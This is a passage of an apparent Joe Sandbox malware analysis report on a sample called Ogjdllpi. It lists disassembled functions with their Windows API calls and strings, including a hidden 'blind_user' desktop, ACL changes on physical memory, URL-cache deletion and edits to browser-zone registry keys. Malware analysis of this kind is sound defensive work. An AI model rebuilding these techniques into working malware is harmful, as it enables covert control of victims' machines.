                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 0040289A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                            • GetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?), ref: 00402976
                            • SetEntriesInAclA.ADVAPI32(00000001,00000002,?,?), ref: 00402988
                            • SetSecurityInfo.ADVAPI32(?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029A3
                            • CloseHandle.KERNEL32(?,?,00000006,?,00000000,00000000,?,00000000,?,00000006,?,00000000,00000000,?,00000000,?), ref: 004029B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoSecurity$CloseEntriesHandle
                            • String ID: @$CURRENT_USER$\device\physicalmemory
                            • API String ID: 405656561-3357994103
                            • Opcode ID: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction ID: 89d45d45e0a184fa7970b295066ffccd564a705ae1855cc5323f3f658fcd5c06
                            • Opcode Fuzzy Hash: 3f106b48de9bb5ba9ca254209248b2c107f34978da584956db3145db2ea5644b
                            • Instruction Fuzzy Hash: 2A41EB71E4030DAFEB108FD4DC85BEEB7B9FB04319F50403AEA00BA191D7B9595A8B59
                            Function 0040509B Relevance: 12.0, APIs: 1, Strings: 7, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • sprintf.CRTDLL(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u,00000000), ref: 004050CD
                            Strings
                            • BrowseNewProcess, xrefs: 00405113
                            • 1601, xrefs: 004050D4
                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u, xrefs: 004050C1
                            • yes, xrefs: 0040510E
                            • .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess, xrefs: 00405118
                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004050FF
                            • GlobalUserOffline, xrefs: 004050FA
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: sprintf
                            • String ID: .DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess$1601$BrowseNewProcess$GlobalUserOffline$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u$Software\Microsoft\Windows\CurrentVersion\Internet Settings$yes
                            • API String ID: 590974362-546450379
                            • Opcode ID: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction ID: cd0aaffbc0bd71aa605591c0976343fec0ffbebd6d6d4fedce8ce2f9217411d7
                            • Opcode Fuzzy Hash: ad57bd7a5e5ee7174c091d0a3ea72984deb32bb5560bbbda773b8a609c7be674
                            • Instruction Fuzzy Hash: 24F07DF2F883587EE710A1699C47F8D765907A1704FA400A7BA44B10C2D0FE56C6826D
                            Function 004077E4 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Focus$CallProcWindow
                            • String ID:
                            • API String ID: 2401821148-0
                            • Opcode ID: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction ID: 67d25c2989ca0d32993d4aa71a0b11dc39683739a3ff9c0c7d6bcfde353c753a
                            • Opcode Fuzzy Hash: 92e1ce8f7ee7a46a278bda77c005b4e0a5389e500612bd3ca87d360d572643d3
                            • Instruction Fuzzy Hash: 6F318233E082149BDF21FB29ED848DA7726A751324715C43AE550B32B1DB787C91CB6E
                            Function 004036B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036D7
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 004036F4
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403715
                            • WriteFile.KERNEL32(00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000), ref: 00403728
                            • CloseHandle.KERNEL32(00000000,00000000,0042CC6C,00000002,?,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?), ref: 00403734
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$CloseCreateHandlePointer
                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
